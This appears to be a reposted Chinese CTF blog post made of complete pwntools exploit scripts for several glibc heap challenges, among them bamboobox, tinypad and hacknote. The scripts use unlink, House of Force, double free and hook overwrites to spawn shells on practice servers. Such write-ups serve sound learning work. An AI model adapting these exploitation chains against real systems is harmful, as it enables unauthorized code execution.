4 21之前做题杂记

4.21之前做题杂记

Tags: Pwn

前几天的基础题都丢在这里了(也不一定是基础题, 做完没印象的也有):

bamboobox:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# NOTE(review): the process() handle is overwritten by remote() on the next
# line, so the local ./bamboobox child is spawned and then leaked (never
# closed or waited on). Keep only the target actually in use.
sh=process('./bamboobox')
sh=remote('127.0.0.1', 9997)
elf=ELF('./bamboobox')
# libc of the host running this script; the one_gadget offsets used further
# down are only valid for this exact libc build.
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'

def Show():
    """Menu option 1: list every note (used for the heap/libc leaks)."""
    sh.sendlineafter(':', '1')
    
def Add(size, content):
    """Menu option 2: allocate a note of `size` bytes holding `content`.

    `content` is sent raw (no trailing newline) so binary payloads pass
    through byte-for-byte.
    """
    sh.sendlineafter(':', '2')
    sh.sendlineafter(':', str(size))
    sh.sendafter(':', content)

def Change(index, size, content):
    """Menu option 3: overwrite note `index` with `size` bytes of `content`.

    The program trusts `size`, which is what makes the heap overflow below
    possible; `content` is sent raw.
    """
    sh.sendlineafter(':', '3')
    sh.sendlineafter(':', str(index))
    sh.sendlineafter(':', str(size))
    sh.sendafter(':', content)

def Remove(index):
    """Menu option 4: free note `index`."""
    sh.sendlineafter(':', '4')
    sh.sendlineafter(':', str(index))

def Exit():
    """Menu option 5: leave the program (runs its exit-time handlers)."""
    sh.sendlineafter(':', '5')

# Heap layout: idx1/idx2 are 0xa0-byte notes (0xb0 chunks, too large for
# fastbins) so that freeing idx2 consolidates backwards; idx0/idx3 are
# small guard notes on either side.
Add(0x10, 'thu1e')
Add(0xa0, 'thu1e')
Add(0xa0, 'thu1e')
Add(0x10, 'thu1e')
# .bss slot holding idx1's data pointer (non-PIE binary, fixed address).
chunk_ptr=0x06020d8
# Unsafe-unlink: a fake free chunk at the start of idx1's data with
# fd=chunk_ptr-0x18 and bk=chunk_ptr-0x10 (so fd->bk == bk->fd == the slot
# itself), then an overflow into idx2's header setting prev_size=0xa0 and
# size=0xb0 with PREV_INUSE clear. Freeing idx2 unlinks the fake chunk and
# leaves chunk_ptr pointing at chunk_ptr-0x18, i.e. inside the note table,
# so every later Change(1, ...) rewrites the table itself.
payload1=p64(0)*2+p64(chunk_ptr-0x18)+p64(chunk_ptr-0x10)+'a'*(0xa0-0x20)+p64(0xa0)+p64(0xb0)
Change(1, len(payload1), payload1)
Remove(2)
# Take the consolidated chunk back out of the unsorted bin so later
# allocations do not disturb the layout (presumably; confirm in gdb).
Add(0x140, 'a')
# Rewrite the first table entry: size 0x10, data pointer -> 0x6020e8
# (another table slot holding a heap pointer); the single trailing byte
# restores the low byte of the following size field.
payload4=p64(0x10)+p64(0x6020e8)+p8(0xa0)
Change(1, len(payload4), payload4)

Show()
sh.recvuntil('0 : ')
# NOTE(review): recv(4) assumes the heap pointer fits in 4 bytes and that
# all 4 arrive in one read; recv(6) plus a length check would be more robust.
leak_heap=u64(sh.recv(4).ljust(8, '\x00'))
# 0x60: distance from the leaked pointer to the heap start.
heap_base=leak_heap-0x60
print 'leak base:'+hex(heap_base)
# Same trick with puts@GOT as the data pointer: Show prints the resolved
# address of puts, which gives the libc base.
payload2=p64(0x10)+p64(elf.got['puts'])+p8(0xa0)
Change(1, len(payload2), payload2)
Show()
sh.recvuntil('0 : ')
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
print 'leak addr:'+hex(leak_addr)
print 'libc base:'+hex(libc_base)
# Hard-coded one_gadget offsets for the host libc loaded above; re-run
# one_gadget if the target libc differs.
one_gadget=[0x45226, 0x4527a, 0xf0364, 0xf1207]
shell=one_gadget[0]+libc_base

# Rebuild a sane note table (size/pointer pairs for idx0..idx3) from the
# leaked heap base so that Change(3, ...) lands on idx3's real data.
payload3=p64(0x10)+p64(heap_base+0x30)+p64(0xa0)+p64(heap_base+0x50)+p64(0x140)+p64(heap_base+0x100)+p64(0x10)+p64(heap_base+0x1b0)
Change(1, len(payload3), payload3)
# House of Force: idx3 is the last chunk before the top chunk, so the
# 0x20-byte write overruns into the top chunk's size field and sets it to
# -1, making malloc accept any request.
Change(3, 0x20, p64(0)*3+p64(0xffffffffffffffff))
# Negative request: moves the top pointer backwards over the existing
# chunks (the +0x8+0xf compensates for malloc's size rounding).
malloc_size=-0x20-0x20-0xb0-0xb0-0x20-0x8-0xf
Add(malloc_size, '\x00')
# The next allocation is carved near the heap start; the two one_gadget
# pointers written there are presumably aimed at the pair of function
# pointers the program calls on exit (confirm offsets in gdb).
Add(0x10, p64(shell)*2)
# Choose option 5 from the interactive session to trigger the call.
#Exit()
sh.interactive()

bjdctf_2020_YDSneedGrirlfriend:

这题写麻烦了

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# NOTE(review): the process() handle is immediately replaced by remote(), so
# the local child is spawned and leaked; keep only the target in use.
sh=process('./bjdctf_2020_YDSneedGrirlfriend')
sh=remote('node3.buuoj.cn',28720)
elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')
# libc shipped with the challenge (glibc 2.23: fastbins, no tcache).
libc=ELF('./libc-2.23.so')

def Add(size, content):
    """Menu option 1: create an entry of `size` bytes named `content`.

    `content` is sent raw so payloads containing newlines or NULs survive.
    """
    sh.sendlineafter('choice :', '1')
    sh.sendlineafter('size is :', str(size))
    sh.sendafter('name is :', content)

def Delete(index):
    """Menu option 2: free entry `index` (the slot stays readable: UAF)."""
    sh.sendlineafter('choice :', '2')
    sh.sendlineafter('Index :', str(index))

def Show(index):
    """Menu option 3: print entry `index`."""
    sh.sendlineafter('choice :', '3')
    sh.sendlineafter('Index :', str(index))

# idx0: 0x90 bytes -> 0xa0 chunk (not a fastbin size, so it lands in the
# unsorted bin when freed); idx1/idx2: 0x60 bytes -> 0x70 fastbin chunks.
Add(0x90, 'a')
Add(0x60, 'b')
Add(0x60, 'c')
Delete(0)
# Re-allocating 0x90 returns the same chunk; 'w'*8 overwrites its fd but
# its bk still holds the unsorted-bin head (main_arena+88).
Add(0x90, 'w'*8)
# UAF read: the deleted index is still printable.
Show(0)
sh.recvuntil('w'*8)
main_arena=u64(sh.recv(6).ljust(8, '\x00'))-88
# NOTE(review): 0x4b20 does not look like main_arena's offset for
# libc-2.23 (the tinypad script on this page uses 0x3c4b20). libc_base is
# only logged and never used, so the exploit still works, but the printed
# value is probably wrong.
libc_base=main_arena-0x4b20
log.success('libc base: '+hex(libc_base))
# Standard fake fastbin chunk in front of __malloc_hook: the bytes at
# main_arena-0x33+8 read as size 0x7f, which passes the 0x70 fastbin
# size check.
fake_chunk=main_arena-0x33
# Fastbin double free: free 1, free 2, free 1 again (with a free of 0 in
# between), leaving 1 -> 2 -> 1 in the 0x70 bin.
Delete(1)
Delete(2)
Delete(0)
Delete(1)
# First malloc returns chunk 1 and writes fake_chunk into its fd.
Add(0x60, p64(fake_chunk))
Add(0x60, 'a')
Add(0x60, '\x05')
#Add(0x60, p8(0)*3+p64(0)+p64(0x400B9C))
#sh.recv()
#sh.sendline('1')
# Fourth malloc returns fake_chunk: 3 + 16 bytes of padding, then 0x400b9c
# (fixed address in the non-PIE binary, presumably a backdoor) lands on
# __malloc_hook, which sits 0x10 below main_arena.
payload=p8(0)*3+p64(0)*2+p64(0x400b9c)
Add(0x60, payload)
Delete(0)
# Option 1 calls malloc again, which now goes through the hook.
sh.recvuntil('choice :')
sh.sendline('1')
#sh.recvuntil('size is :')
#sh.sendline(0x30)
sh.interactive()

ciscn_2019_s_6:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node3.buuoj.cn',27102)
# libc shipped with the challenge (glibc 2.27: tcache, no double-free
# detection); used for the system/__free_hook symbols below.
libc=ELF('./libc-2.27.so')

def Add(size, name, call):
    """Menu option 1: add a contact of `size` bytes.

    The size prompt ends in 'name\\n'; `name` and `call` are sent raw
    (no newline appended) so binary payloads survive.
    """
    sh.sendlineafter('choice:', '1')
    sh.sendlineafter('name\n', str(size))
    sh.sendafter('name:\n', name)
    sh.sendafter('call:\n', call)

def Show(index):
    """Menu option 2: print contact `index` (works after free: UAF read)."""
    sh.sendlineafter('choice:', '2')
    sh.sendlineafter('index:\n', str(index))

def Delete(index):
    """Menu option 3: free contact `index` (can be called twice: double free)."""
    sh.sendlineafter('choice:', '3')
    sh.sendlineafter('index:\n', str(index))

# Unused here: the exploit goes through __free_hook -> system instead.
onegadget=[0x4f2c5, 0x4f322, 0x10a38c]
# 0x500 exceeds the tcache chunk limit, so freeing idx0 puts it in the
# unsorted bin; idx1 keeps it from merging into the top chunk.
Add(0x500, 'a', 'a')
Add(0x30, 'a', 'a')
Delete(0)
# UAF read: the freed chunk's fd (unsorted-bin head = main_arena+96) is
# printed as the name.
Show(0)
sh.recvuntil('name:\n')
leak_libc=u64(sh.recv(6).ljust(8, '\x00'))
main_arena=leak_libc-96
log.success('main_arena: '+hex(main_arena))
# main_arena offset for ./libc-2.27.so; re-derive if the libc differs.
libc_base=main_arena-0x3ebc40
fake_chunk=libc_base+libc.sym['__free_hook']
# tcache double free (glibc 2.27 does not detect it): the 0x40 bin now
# holds chunk1 -> chunk1.
Delete(1)
Delete(1)
# idx2: returns chunk1 and poisons its next pointer with __free_hook.
Add(0x30, p64(fake_chunk), 'a')
# idx3: chunk1 again.
Add(0x30, 'a', 'a')
# idx4: malloc returns __free_hook itself; overwrite it with system.
Add(0x30, p64(libc_base+libc.sym['system']),'a')
# idx5: a chunk whose content is "/bin/sh".
Add(0x30, '/bin/sh\x00','a')
# free(idx5) -> __free_hook("/bin/sh") -> system("/bin/sh").
Delete(5)
sh.interactive()

oneshot_tjctf_2016:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# NOTE(review): the process() handle is immediately replaced by remote(), so
# the local child is spawned and leaked; keep only the target in use.
sh=process('./oneshot_tjctf_2016')
sh=remote('node3.buuoj.cn',28784)
elf=ELF('./oneshot_tjctf_2016')
libc=ELF('./libc-2.23.so')
context.log_level='debug'
# The program reads one address, prints the value stored there, then reads
# a second address and jumps to it: one arbitrary read, one call.
sh.recvuntil('?\n')
# Ask for puts@GOT (sent in decimal, as the program parses it) to leak the
# libc address of puts.
sh.sendline(str(elf.got['puts']))
sh.recvuntil('Value: ')
#print sh.recvuntil('\n').split()[0]
# Output looks like "Value: 0x7f..."; parse the first token as hex.
puts_addr=int(sh.recvuntil('\n').split()[0], 16)
libc_base=puts_addr-libc.sym['puts']
# sys_addr / bin_addr are computed but not used; the one_gadget is used.
sys_addr=libc_base+libc.sym['system']
bin_addr=libc_base+next(libc.search('/bin/sh\x00'))
# one_gadget offsets for ./libc-2.23.so; index 0 is the one used here.
onegadget=[0x45216, 0x4526a, 0xf02a4, 0xf1147]
payload=str(libc_base+onegadget[0])
# NOTE(review): recv() just drains whatever is pending; recvuntil on the
# second prompt would be more deterministic.
sh.recv()
sh.sendline(payload)
sh.interactive()

wustctf2020_easyfast:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# NOTE(review): the process() handle is immediately replaced by remote(), so
# the local child is spawned and leaked; keep only the target in use. `elf`
# is loaded but never used.
sh=process('./wustctf2020_easyfast')
sh=remote('node3.buuoj.cn',26855)
elf=ELF('./wustctf2020_easyfast')
#context.log_level='debug'
# Menu (inferred from usage below): 1 = malloc(size), 2 = free(idx),
# 3 = write into chunk idx, 4 = presumably the win/flag option.
# Allocate idx0 (0x40 -> 0x50 fastbin chunk) ...
sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
# ... and free it.
sh.recvuntil('>\n')
sh.sendline('2')
sh.recvuntil('>\n')
sh.sendline('0')

# UAF write: the freed chunk is still writable, so its fd becomes
# 0x602080, a fixed .bss address in this non-PIE binary. For the fastbin
# size check to pass, the qword at 0x602088 must read as a 0x50-sized
# chunk (presumably a global with that value; confirm in the binary).
sh.recvuntil('>\n')
sh.sendline('3')
sh.recvuntil('>\n')
sh.sendline('0')
sh.send(p64(0x0602080))

# Two mallocs of the same size: the first (idx1) returns the real chunk,
# the second (idx2) returns the fake chunk at 0x602080 (data at 0x602090).
sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
sh.recvuntil('>\n')
sh.sendline('1')
sh.recvuntil('>\n')
sh.sendline(str(0x40))
# Writing idx2 stores 8 zero bytes at 0x602090 -- presumably the global
# that option 4 checks before handing out the flag.
sh.recvuntil('>\n')
sh.sendline('3')
sh.recvuntil('>\n')
sh.sendline('2')
sh.send(p64(0))
sh.recvuntil('>\n')
sh.sendline('4')
sh.interactive()

tinypad:

有一个循环逐字节覆盖 \x00 的技巧蛮有意思的(用 edit 的 NUL 截断把含 \x00 的偏移一字节一字节写进 prev_size), 有点类似 HITCON 2018 的 children_tcache

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./tinypad')
elf=ELF('./tinypad')
# Host libc; main_arena_offset and the one_gadget offsets below are for
# this build (presumably glibc 2.23) and must be re-derived otherwise.
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level='debug'
main_arena_offset=0x3c4b20
def add(size, content):
    """Command 'a': add a pad of `size` bytes with `content`.

    The content is sent with a newline (sendline), matching the program's
    line-based input.
    """
    sh.sendlineafter('(CMD)>>> ', 'a')
    sh.sendlineafter('(SIZE)>>> ', str(size))
    sh.sendlineafter('(CONTENT)>>> ', content)

def edit(idx, content):
    """Command 'e': replace pad `idx`'s content and confirm with 'Y'.

    Pads are numbered as the program numbers them (1-based).
    """
    sh.sendlineafter('(CMD)>>> ', 'e')
    sh.sendlineafter('(INDEX)>>> ', str(idx))
    sh.sendlineafter('(CONTENT)>>> ', content)
    sh.sendlineafter('Is it OK?\n', 'Y')

def delete(idx):
    """Command 'd': free pad `idx` (its contents remain listed afterwards)."""
    sh.sendlineafter('(CMD)>>> ', 'd')
    sh.sendlineafter('(INDEX)>>> ', str(idx))

# 1. leak heap base
# Two 0x70 (fastbin-sized) pads and one 0x100 pad. The program numbers
# pads from 1; the "idx N" comments below are 0-based.
add(0x70, 'a' * 8)  # idx 0
add(0x70, 'b' * 8)  # idx 1
add(0x100, 'c' * 8)  # idx 2

delete(2)  # free idx 1 (goes to the 0x80 fastbin)
delete(1)  # free idx 0: its fd now points at idx 1's chunk
# The freed pad is still listed (UAF read), so its fd leaks a heap address.
sh.recvuntil(' # CONTENT: ')
data = sh.recvuntil('\n', drop=True)  # fd of idx 0 = address of idx 1's chunk
heap_base = u64(data.ljust(8, '\x00')) - 0x80
log.success('get heap base: ' + hex(heap_base))

# 2. leak libc base
# Freeing the 0x100 pad (not fastbin-sized) triggers malloc_consolidate:
# idx0 is first moved to the unsorted bin, then idx1 is merged with it
# (unlink) and the result is merged into the top chunk. Because of how
# unlink works, idx0's fd/bk written during consolidation are left in
# place, so the listing of idx0 now shows the unsorted-bin head.
delete(3)
sh.recvuntil(' # CONTENT: ')
data = sh.recvuntil('\n', drop=True)
# 88 = 0x58: mutex/flags (8) + fastbinsY (10*8) puts the unsorted bin
# head at main_arena+0x58 (glibc 2.23 layout).
unsorted_offset_arena = 8 + 10 * 8
main_arena = u64(data.ljust(8, '\x00')) - unsorted_offset_arena
libc_base = main_arena - main_arena_offset
log.success('main arena addr: ' + hex(main_arena))
log.success('libc base addr: ' + hex(libc_base))

# 3. house of einherjar
add(0x18, 'a' * 0x18)  # idx 0
# we would like trigger house of einherjar at idx 1
add(0xf8, 'b' * 0xf8)  # idx 1
add(0x100, 'c' * 0xa0)  # idx 2

# The fake chunk lives in tinypad's global buffer (non-PIE .bss).
fake_chunk_addr=0x602060
# Chunk that will be consolidated backwards into the fake chunk; its
# prev_size must equal the distance to fake_chunk_addr.
einh_chunk_addr=heap_base+0x20
fake_chunk_offset=einh_chunk_addr-fake_chunk_addr
# The offset has high zero bytes, but edit() appears to stop at the first
# NUL of its input and NUL-terminate the copy. So the offset is written
# from the longest prefix down: each pass sends the non-zero bytes plus
# one fewer filler byte, and the terminator supplies the next zero byte
# of the offset. The first pass is exactly 0x18 bytes, so its terminator
# also clears the low byte of the next chunk's size field (off-by-one NUL
# -> PREV_INUSE cleared). Presumably; confirm the copy routine in gdb.
num_of_zero=len(p64(fake_chunk_offset))-len(p64(fake_chunk_offset).strip('\x00'))
for i in range(num_of_zero+1):
    payload='a'*0x10
    payload+=p64(fake_chunk_offset).strip('\x00')+'a'*(num_of_zero-i)
    edit(1, payload)
#Edit(1, )
# Build the fake chunk at 0x602060 through pad 3's content: size 0x101
# with fd and bk pointing at itself so the unlink check passes.
payload='f'*0x28+p64(0x101)+p64(0x602060)*2
edit(3, payload)
# Freeing the 0x100 pad consolidates it backwards into the fake chunk,
# which ends up in the unsorted bin.
delete(2)
#print str(proc.pidof(sh))

# Reset the fake chunk's size (consolidation enlarged it) before
# allocating from it.
payload='d'*0x28+p64(0x101)
#payload='\x11'
edit(3, payload)
# malloc(0xf0) now returns the fake chunk in .bss, so this write reaches
# the pad table: pad 1's pointer -> __environ (stack leak), pad 2's
# pointer -> 0x602148, presumably the slot holding pad 1's pointer.
payload='f'*0xd0+'a'*8+p64(libc_base+libc.sym['__environ'])+'b'*8+p64(0x602148)#.strip('\x00')
add(0xf0, payload)
sh.recvuntil('CONTENT: ')
environ_addr=u64(sh.recv(6).ljust(8, '\x00'))
log.success('environ addr: '+hex(environ_addr))
# Hard-coded distance from the environ value to the saved return address
# that is targeted below; depends on this binary/libc build.
ret_addr=environ_addr-0xf0
#delete(2)
log.success('ret addr: '+hex(ret_addr))
# Editing pad 2 rewrites pad 1's pointer to ret_addr; editing pad 1 then
# writes the one_gadget over the saved return address.
edit(2, p64(ret_addr))
oengadget=[0x45226,0x4527a,0xf0364,0xf1207]
edit(1, p64(libc_base+oengadget[0]))
#edit(3, payload)
#Delete(3)
# 'q' quits; presumably the function returns into the gadget.
sh.recv()
sh.sendline('q')
sh.interactive()

hacknote:

wiki上给的和buu上的不一致, 搞得我浪费俩小时, 我真是铁猪鼻

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./hacknote')
sh=remote('node3.buuoj.cn',26556)
elf=ELF('./hacknote')
# 32-bit libc shipped with the challenge; the puts/system offsets come from it.
libc=ELF('./libc_32.so.6')

def Add(size, content):
    """Menu option 1: add a note with a `size`-byte content buffer.

    `content` is sent raw so the packed pointers below survive intact.
    """
    sh.sendlineafter(':', '1')
    sh.sendlineafter(':', str(size))
    sh.sendafter(':', content)

def Delete(index):
    """Menu option 2: free note `index` (the slot is not cleared: UAF)."""
    sh.sendlineafter(':', '2')
    sh.sendlineafter(':', str(index))

def Print(index):
    """Menu option 3: print note `index` via the note's own print pointer."""
    sh.sendlineafter(':', '3')
    sh.sendlineafter(':', str(index))

# Two notes. Each note appears to be a small struct {print_fn, content_ptr}
# plus a separately allocated content buffer (inferred from the payload
# layout below).
Add(16, 'a')
Add(16, 'a')
Delete(0)
Delete(1)
# Fastbin LIFO: the new note's 8-byte content buffer is presumably carved
# from note 0's freed struct chunk, so this write rebuilds note 0's struct
# as {0x804862b (the binary's print routine, presumably), puts@GOT}.
# Note 0 is still indexable after Delete (UAF).
Add(8, p32(0x804862b)+p32(elf.got['puts']))
print str(proc.pidof(sh))
#pause()
# print_fn(note0) -> prints *puts@GOT: leaks the libc address of puts.
Print(0)
# NOTE(review): recv(4) assumes the 4 bytes arrive in one read.
puts_addr=u32(sh.recv(4))
libc_base=puts_addr-libc.sym['puts']
sys_addr=libc_base+libc.sym['system']
print hex(puts_addr)
print hex(libc_base)
print hex(sys_addr)

# Free the helper note so the same chunks come back, then rebuild note 0's
# struct as {system, ";sh"}: Print(0) becomes system("<4 addr bytes>;sh");
# the shell fails on the garbage command and then runs sh.
Delete(2)
Add(8, p32(sys_addr)+';sh\x00')
Print(0)
#print str(proc.pidof(sh))
#pause()
sh.interactive()


转载自blog.csdn.net/eeeeeight/article/details/115973861